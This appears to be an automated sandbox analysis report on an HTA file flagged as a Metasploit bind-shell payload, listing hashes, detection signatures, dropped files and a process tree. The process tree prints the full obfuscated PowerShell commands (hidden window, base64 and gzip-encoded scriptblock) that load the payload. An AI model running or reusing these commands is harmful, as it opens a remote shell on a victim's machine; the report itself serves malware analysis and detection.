Analysis

  • max time kernel
    96s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 01:03

General

  • Target

    14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta

  • Size

    7KB

  • MD5

    bce1078c57268ef42732dc651d2049c9

  • SHA1

    e3df7d0b57e1a98c7614765abb51cf80f8b0c703

  • SHA256

    14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3

  • SHA512

    2c2d3569955489efe9c0c2b1f421bfab215bb0a36cb53002328bb4c2437f9731b853fa2db4ee74b98c6e7140c5ecac7f4e1bad86ba5af448f2c9b7f7cc657250

  • SSDEEP

    192:Un2jh1hqT2Rxq0rNMP/9urq9oUSx8F6Nh3p3k2Zp2dHhxd:Un2jh1hscQ0rg0G9oUSU6NzDQdHhxd

Malware Config

Extracted

Family

metasploit

Version

windows/shell_bind_tcp

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\14cff907c52f3c8efc51e1775fca708be95910b3488107d5be4e0b2cd5bcaaa3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARgBrADMAMQAyAFUAQwBBADcAVgBXAGEAMgAvAGEAUwBCAHsAMAB9ADkAWABxAG4ALwB3AGEAcQBRACcAJwArACcAJwBiAEsAcwBFADgAMgByAGEAUgBLAHEAMABOAG8AYQBZAGwARgBkAGkAcwBIAGsAVQByAFEAWgA3AE0AQgBQAEcASABtAEsAUABBADIAeQAzAC8AMwAzAHYAZwBKADMAUQBiAGIASwBiAFgAYQBrAGoASQBjAFkAegA5AHoAVgBuAHoAcgAxADMAbABtAG4AawBjAGMASQBpAEsAWgB4AEsAMwA5AHsAMQB9ACsAawBiAEkAeABRAEQARQBLAEoAYQBVAFEAawBhAEEAbwBGAHsAMAB9AHkATABmAFcAaQBxAHsAMAB9ADcAcwBGAGgAcQBlAEwAawBmAFIAWgBVAG0AYgB7ADEAfQBaAG0ATwB5AEUASgBGAG8AZgBuAG4AWgBTAE8ATQBZAFIALwB6ADQAWABiAHIAQwBYAEUAOABTAEgAQwA0AG8AdwBZAG0AaQBTAG4AOQBLADcAZwByAEgAKwBLAHkALwB1AE0ATQBlAGwANwA1AEoAaABkADkATABWADUAUQB0AEUATQAzAEUAOQBnADMAawByAGIAQgAwAHAAawBlACsAMgBPAHMAdwBEADQAbgBJAFMAdgBhAEcARQBxADcASQBYADcALwBLAHsAMQB9AHUAeQBzAE0AaQA4ADEANwAxAE4ARQBFADAAVwAyADkAdwBuAEgAWQBjAG0AbgBWAEYAYQBsADcAewAxAH0AcAB3AE8ATgB4AHYAcwBDAEoAMwBpAFIAZQB6AGgAQwAxADUAeQBTAFYAUgByAFYAbwBhAFIAUQBsAGEANABoADUAWQBlADgAQgBkAHoARgBmAE0AewAwAH0AMgBRADQAegBkAE4ANQBZAHMAegB7ADAAfQBPAE0AcQBPACcAJwArACcAJwBKAGUAdwBjAHAAUgBRAFoAcABvAE8AWQBlAGIAcgB2AHgAegBoAEoANQBLAEkAMABFAHgANQBtADgALwBsAHYAeQBpAHgAegBmADUAdABHAG4ASQBTADQAMQBJADQANABqAHQAbgBHAHgAdgBFACcAJwArACcAJwBEADgAWABCAFMAcwBsAEQAawBVADMAeQBMAGwAMwBQAFEAcwBuAGwATQBvAG0AQwB1AHEAaQBEADIAdwBOAFkAWQBnAEUAMABwAEwAVQByAC8AeABZAHoAUwB3ADkAcwBjAHYATgBjAHEASwBhAGQASwBJAEQAWABnAHMAVgBxAEUAYQAzADMAdQBvAEYAMwBtAHAAeABRAGYAVgBlAFYAbgBJAGgAVgBjAFUARwBFADgAOABnAEUAZwAvAEMANQBRAFgATwBZAFUAOABuAEQANwBHAFEANAA5AEwAZQBSAGoAZAB0AGoAQgBFAEwATQB5AFkAQQBrADUAewAxAH0ASAB7ADEAfQBXAHkAawBXAHAAQwA4ADQAUgBaAC8ARQBlAFAAZwB2AEQATwBNAFgAcQAvAEIARgB4AHEAYgBCAHYARgAxADkAcgBxADUASQByAGcAdABwAEQAOQBlAGIAVwBoAGIAVwBaAHcANABnAC8AZgA3AEwAdwBBAHcATQBLAGkAMAArACcAJwArACcAJwA0AEoANABSAGUANQByAE8ASgBsAHkAewAwAH0AQwA1AGoANQBDAEkAZgBGAHkAeQBpAHIAUAAzAFEAJwAnACsAJwAnAHAAZQBVAG4AeABBAHAASgBTAEwAOQBTAEIARQBSAGMANAAyAHMARwA5AGkAaQBnAFAARQBCAGMAeQBDAEgARAArAHAATgBVAFAAQwBIADMAVwBOAGwARgBBAGYAeAA3AG8ASABOADUAdABBAFYASABEAHAAewAxAH0AbwAvAEIASABHADkATwBrAGQAdABSAEYANABlAEEAMwB2AEUAYgAyAEYAcABZAFEAcQBMAGcAWABEAHAATABqAG4AMwB1AFgAWAB5AEQAawBOAHkAZwBLAEUAbQBLADAAaQBDAEYAewAwAH0AUABXAEsAawBvADAAUgB4AFgANQBSADAAcQBPAEUAWgBGAHQAewAxAH0AeQB0AGwAaABLAGoAKwBGADIAMAAwAHAASgB4ADUASwBlAEcANQB1AHIAdgA0AE4AegBzAHgAdABnADAAVQBKAGoAMQBNAFAANwBoAFUAZwBHAE4AbwBiADcAQgBGAEUAQgBTAEoARgB5AFMASQArAE4AdgBhADIASwBEAEoASAA5AC8ASwB6AGUARABRAFEAcABaAEEALwBZAE8AawBCADcAZwBOAFcAQgBBADQAMgBGACcAJwArACcAJwAyAHkAJwAnACsAJwAnAEoASQBWAEoAZwBoAGwAcQB5AE0AVwArAEgARwA0AHAARABrAEQAagBVAGoAJwAnACsAJwAnAFIAWgBGAEEAVgBTAEoATABFAGMATwA1AEUASQBCADkAdQBVAFgAdwBzAHcAegAnACcAKwAnACcANABVAGgANwBnAFUAcwBPAHkARQBtAFEAYwBOAGsAMgBaAGIAdwBvAE8AUwB7ADAAfQBtAFUASQBVAEUAeABnAGQAKwAvAFkAOABnAGYAaQA0AC8AaAAyAGcAYQBNAGMANwB1AFIAcwBrAHsAMAB9AGIARwBiAHMAdQBVAGkAQgBnAGoAOQBvAEMAWQA1AG0AQQBCACcAJwArACcAJwAzAGcAaQBEAGwAQQAwAFkAcABaAGEASwBBAEUAbgA5AGUAUABoAFUAWgA1AHAALwBYAEoAUQBJAGMAeABNAFMAMgBiAFkARwBkAE4ASwB1ADAAdAAvAEwAcgB3AEcANQBrAGYALwBTAC8AWABqAE8AKwAvAG0ASgBiAFcAOQBSAHIASgA0AEsAcgAxAFMAUwBmAGIAWQBPAHQAOQB7ADEAfQB1AG0AZQBmACsAMwBqAEMAOQB1AHAAYwA3AHYAWgA1AG8AMgBCAGIAdAAyAFEAcwBsAEYAZgBlAFUAWgA1AEsATwBhAFYASQBDAEQAbABZAEQATABTAHIAZQBIAEsAbwArAFYAQgBNACsAegAwADIAcwBsAE8AMgAxAHAAdQAxAHoATwBOAFAANwBiAFYAQgBKAGgAYQByADEAdgBqAHMAbAB7ADEAfQByADEAZgB1ADEAOABoAHIAUQBtADQARABlAFcAdgBkADcASQAnACcAKwAnACcAZABuAHUATwBqAEMASABpAHQAcgB2AEcATwAzAEUASwBMAGQAcAA4ADcAcAB4AHUAMwBDAHIAcgBhAGwATABMAGEAMwBlAFcAaQAxAGQAbAB0AGoAbgBFADEAUAB7ADAAfQB0AEEAcwBmAG0AZAAyADkAcgBoAHYATQByADMAWAAzADQAOABvAHQARwAxAHAAZQBhAEcAaQBhAGsAMQA3AHIAQgBoAHgAdgBzADIAdgBkADMAcQBCAEcAcQBLAE8AdABxAFYAVgBjADEAbgBFAGQAawAyAGcAdQBNADEAQgB3AHoAYwA0AEQAYgBWAGsAZgBhAEEAewAxAH0AdAAnACcAKwAnACcAQgBnADMAOQBlAG0AYwBRAFAATAAxAHYAdABxAFoAagAxAE8AMABzAGUAdABXAGwAVgBwAG0ATQBkAGIAUAB1AGYAQgBBADQATwBWAFYAUwBPAHgALwBlAGcAVQB0AG4AagBLAHgAaAAwAG4AOQB2AGEAUgBVAEgAdwA5AHgASgBoAHsAMQB9ADQAbABiAE8AdABvAFoAYgBLAG0ARQBHADUAYgBjAEcAeAA3AGEAewAxAH0AUQBYAHEAWABXAHoAOQBjAHoAeAAzAGUASQBMAGQAWQB7ADAAfQBkAHUATgAvAFMAagByAEwAQgByAGUAdQBBADMAewAxACcAJwArACcAJwB9AHEAMwBXAG0AbwBYAHIAdgBsAGUATgA5ADUAMwBKAGsAawBWAHIAUQAxADIAaQBMAHcAMQB2AGQAZQB2AFYAcABOAE4AYQAwAEIAaABmAHoAaQBxAE0AdAAyAGgAdgB7ADAAfQBIAFMATwA5AE8AOQBzAEQARQBaADEASABXAHIAYgB1AGwAZQBkADcATwBMAHgAcAB2AHQAeAA0AGMAdABSADkAYwB1AEMAbwB5AGgAZABqAEgAewAxAH0ALwBBAHsAMQB9ADQAJwAnACsAJwAnAE0AUgB1AFIAaQBOAGUAcQA4ADAASwA0AEYAdQBYAHoANwBaAHYAQwB3ADUAMgArAHsAMAB9AFUANABZADgAbABKAC8AewAxAH0ASwBJADQAVwBTAEUASwB6AEkARwAnACcAKwAnACcAewAxAH0AbgArAGQAdgBpADgAVwB0AHIASgBJAFAARwBCAEUAYQBpAGcASwBQAGcAagBXAE8ASQAwAHkAaABpADAASwBmAHoAVwBtAHYAVQA4AG8AOAAwAFUAaABFAHgAWQBjAGUAZAB1AHcAcwBvAHQARwBOADIAbwBlAFEAbgBwAHUAcAAwAHEATwAnACcAKwAnACcAZwArAHQAUgBlADgAcQBYAEwAeQB5AG0ARQBDAEcAawBFAEgAQwAnACcAKwAnACcAOQAxAGMAQgB7ADAAfQB3AFYAJwAnACsAJwAnAGIARwA4AHEANQBYAEwAMABCAGIASwB1ADMATAA5AGsARABDAHYAUAAxAGUARABiAGYAYQBLAHMARgBVAFUAZgBlAFUASQB7ADAAfQBHAGEAYwBIAG8AeQBEAFAAYgBLAFUAJwAnACsAJwAnAEYATwBWAFgAUQB3AFgAUABCAHcANQBWADcARQBXACcAJwArACcAJwB3AFgAcwBJAE4ASABLACsAaAB7ADEAfQBrAEEAUgBQAEoAWQBDAGcAWgA3AEIARwBEADMARgBMAGoALwBXAEkAeABGAE8AcwBBAFAAUQBLAG4ARAB5AG0AWABnADUAQQBFAEYAQQAvAHcAegBmAFMAdwBVAHUAbQB1AHAAcABrAHkANQA0AHcAYQA4AGsAewAwAH0ARgBiAE4AVgB2AEQAbgAvAHcAdABoAG4AdABiACsAWQBmAGQAVgBKAEMAbwBYAE0AMgBSACsAVwB2ADkAeAA0AGEAUQB7ADAAfQAvAEQASQBBAFgARQBRADQAeQBOAGwAUQBsAFMAawArAHYAaABPAGUAeABTAEgATABrAFoAUABMADkAUQBKAEkAZwBHAFUAMgB4AFAATwA1AG4ALwBLAHoASABqAHoARwBEAGwAMwBoAEwALwArAHEAZABKAEsANABDAHcAQQBBACcAJwApAC0AZgAnACcAVAAnACcALAAnACcANgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5024
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAFk312UCA7VWa2/aSB{0}9Xqn/waqQ'+'bKsE82raRKq0NoaYlFdisHkUrQZ7MBPGHmKPA2y3/33vgJ3QbbKbXakjIcYz9zVnzr13lmnkccIiKZxK39{1}+kbIxQDEKJaUQkaAoF{0}yLfWiq{0}7sFhqeLkfRZUmb{1}ZmOyEJFofnnZSOMYR/z4XbrCXE8SHC4owYmiSn9K7grH+Ky/uMMel75Jhd9LV5QtEM3E9g3krbB0pke+2OswD4nISvaGEq7IX7/K{1}uysMi8171NEE0W29wnHYcmnVFal7{1}pwONxvsCJ3iRezhC15ySVRrVoaRQla4h5Ye8BdzFfM{0}2Q4zdN5Ysz{0}OMqO'+'JewcpRQZpoOYebrvxzhJ5KI0Ex5m8/lvyixzf5tGnIS41I44jtnGxvE'+'D8XBSslDkU3yLl3PQsnlMomCuqiD2wNYYgE0pLUr/xYzSw9scvNcqKadKIDXgsVqEa33uoF3mpxQfVeVnIhVcUGE88gEg/C5QXOYU8nD7GQ49LeRjdtjBELMyYAk5{1}H{1}WykWpC84RZ/EePgvDOMXq/BFxqbBvF19rq5IrgtpD9ebWhbWZw4g/f7LwAwMKi0+'+'4J4Re5rOJly{0}C5j5CIfFyyirP3Q'+'peUnxApJSL9SBERc42sG9iigPEBcyCHD+pNUPCH3WNlFAfx7oHN5tAVHDp{1}o/BHG9OkdtRF4eA3vEb2FpYQqLgXDpLjn3uXXyDkNygKEmK0iCF{0}PWKko0RxX5R0qOEZFt{1}ytlhKj+F200pJx5KeG5urv4Nzsxtg0UJj1MP7hUgGNob7BFEBSJFySI+Nva2KDJH9/KzeDQQpZA/YOkB7gNWBA42F'+'2y'+'JIVJghlqyMW+HG4pDkDjUj'+'RZFAVSJLEcO5EIB9uUXwswz'+'4Uh7gUsOyEmQcNk2ZbwoOS{0}mUIUExgd+/Y8gfi4/h2gaMc7uRsk{0}bGbsuUiBgj9oCY5mAB'+'3giDlA0YpZaKAEn9ePhUZ5p/XJQIcxMS2bYGdNKu0t/LrwG5kf/S/XjO+/mJbW9RrJ4Kr1SSfbYOt9{1}umef+3jC9upc7vZ5o2Bbt2QslFfeUZ5KOaVICDlYDLSreHKo+VBM+z02slO21pu1zONP7bVBJhar1vjsl{1}r1fu18hrQm4DeWvd7I'+'dnuOjCHitrvGO3EKLdp87pxu3CrralLLa3eWi1dltjnE1P{0}tAsfmd29rhvMr3X348otG1peaGiak17rBhxvs2vd3qBGqKOtqVVc1nEdk2guM1Bwzc4DbVkfaA{1}t'+'Bg39emcQPL1vtqZj1O0setWlVpmMdbPufBA4OVVSOx/egUtnjKxh0n9vaRUHw9xJh{1}4lbOtoZbKmEG5bcGx7a{1}QXqXWz9czx3eILdY{0}duN/SjrLBreuA3{1'+'}q3WmoXrvleN953JkkVrQ12iLw1vdevVpNNa0BhfziqMt2hv{0}HSO9O9sDEZ1HWrbuled7OLxpvtx4ctR9cuCoyhdjH{1}/A{1}4'+'MRuRiNeq80K4FuXz7ZvCw52+{0}U4Y8lJ/{1}KI4WSEKzIG'+'{1}n+dvi8WtrJIPGBEaigKPgjWOI0yhi0KfzWmvU8o80UhExYceduwsotGN2oeQnpup0qO'+'g+tRe8qXLyymECGkEHC'+'91cB{0}wV'+'bG8q5XL0BbKu3L9kDCvP1eDbfaKsFUUfeUI{0}GacHoyDPbKU'+'FOVXQwXPBw5V7EW'+'wXsINHK+h{1}kARPJYCgZ7BGD3FLj/WIxFOsAPQKnDymXg5AEFA/wzfSwUumuppky54wa8k{0}FbNVvDn/wthntb+YfdVJCoXM2R+Wv9x4aQ{0}/DIAXEQ4yNlQlSk+vhOexSHLkZPL9QJIgGU2xPO5n/KzHjzGDl3hL/+qdJK4CwAA')-f'T','6')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    01484d579b19bfb0bd28ab27d9087a7d

    SHA1

    5bb9eb10554554ae4b2b1ed52852cd896d334e86

    SHA256

    e014226ee04a420ec091420428a3879b00952d6d762f547be576fbb843541c33

    SHA512

    ca1d79cb4b9984fffd5f252ace39722d272582f0327ecb9355e570e7f1d59472f583f8a96f7f97ad76e7576f5af6ae70faae2eddfdf8177acc335ee743e1465b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zx34ae4q.iy0.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2404-36-0x0000000005E40000-0x0000000005E41000-memory.dmp
    Filesize

    4KB

  • memory/5024-4-0x0000000074E90000-0x0000000075640000-memory.dmp
    Filesize

    7.7MB

  • memory/5024-19-0x0000000006720000-0x000000000676C000-memory.dmp
    Filesize

    304KB

  • memory/5024-7-0x0000000006070000-0x00000000060D6000-memory.dmp
    Filesize

    408KB

  • memory/5024-6-0x0000000005F50000-0x0000000005FB6000-memory.dmp
    Filesize

    408KB

  • memory/5024-0-0x0000000074E9E000-0x0000000074E9F000-memory.dmp
    Filesize

    4KB

  • memory/5024-17-0x00000000060E0000-0x0000000006434000-memory.dmp
    Filesize

    3.3MB

  • memory/5024-18-0x00000000066D0000-0x00000000066EE000-memory.dmp
    Filesize

    120KB

  • memory/5024-5-0x0000000005820000-0x0000000005842000-memory.dmp
    Filesize

    136KB

  • memory/5024-20-0x0000000008020000-0x000000000869A000-memory.dmp
    Filesize

    6.5MB

  • memory/5024-21-0x0000000006C00000-0x0000000006C1A000-memory.dmp
    Filesize

    104KB

  • memory/5024-25-0x0000000074E90000-0x0000000075640000-memory.dmp
    Filesize

    7.7MB

  • memory/5024-3-0x0000000005920000-0x0000000005F48000-memory.dmp
    Filesize

    6.2MB

  • memory/5024-2-0x0000000074E90000-0x0000000075640000-memory.dmp
    Filesize

    7.7MB

  • memory/5024-1-0x00000000030F0000-0x0000000003126000-memory.dmp
    Filesize

    216KB